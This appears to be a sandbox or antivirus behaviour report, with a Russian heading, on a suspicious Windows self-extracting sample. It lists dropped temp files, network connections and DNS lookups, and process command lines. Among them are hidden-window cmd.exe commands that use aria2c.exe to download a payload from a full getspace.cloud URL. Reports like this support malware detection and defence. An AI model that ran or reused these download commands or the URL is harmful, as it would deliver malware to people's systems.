Техническая информация
- <SYSTEM32>\cmd.exe
- %TEMP%\7zipsfx.000\aria2c.exe
- %TEMP%\7zipsfx.000\ttl_6.exe
- %WINDIR%\temp\cab51c7.tmp
- %WINDIR%\temp\tar51c8.tmp
- %TEMP%\7zipsfx.000\602.wcs.aria2__temp
- %TEMP%\7zipsfx.000\602.wcs
- %TEMP%\7zipsfx.000\data.bin
- %WINDIR%\temp\cab51c7.tmp
- %WINDIR%\temp\tar51c8.tmp
- %TEMP%\7zipsfx.000\602.wcs.aria2
- %TEMP%\7zipsfx.000\602.wcs
- %TEMP%\7zipsfx.000\602.wcs.aria2__temp в %TEMP%\7zipsfx.000\602.wcs.aria2
- 'ge###ace.cloud':443
- 'r3.#.lencr.org':80
- 'microsoft.com':80
- 'ge###ace.cloud':443
- DNS ASK ge###ace.cloud
- DNS ASK r3.#.lencr.org
- DNS ASK microsoft.com
- '%TEMP%\7zipsfx.000\ttl_6.exe'
- '%TEMP%\7zipsfx.000\aria2c.exe' -c "https://getspace.cloud/cloud/s/fNzjyzaoNCfJABo/download?path=/&files=602.wcs"
- '<SYSTEM32>\cmd.exe' /c mode con lines=4 cols=60 & color e & %TEMP%\7ZipSfx.000\aria2c.exe -c "https://getspace.cloud/cloud/s/fNzjyzaoNCfJABo/download?path=/&files=602.wcs"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c mode con lines=4 cols=60 & color e & %TEMP%\7ZipSfx.000\aria2c.exe -c "https://getspace.cloud/cloud/s/fNzjyzaoNCfJABo/download?path=/&files=602.wcs"
- '<SYSTEM32>\mode.com' con lines=4 cols=60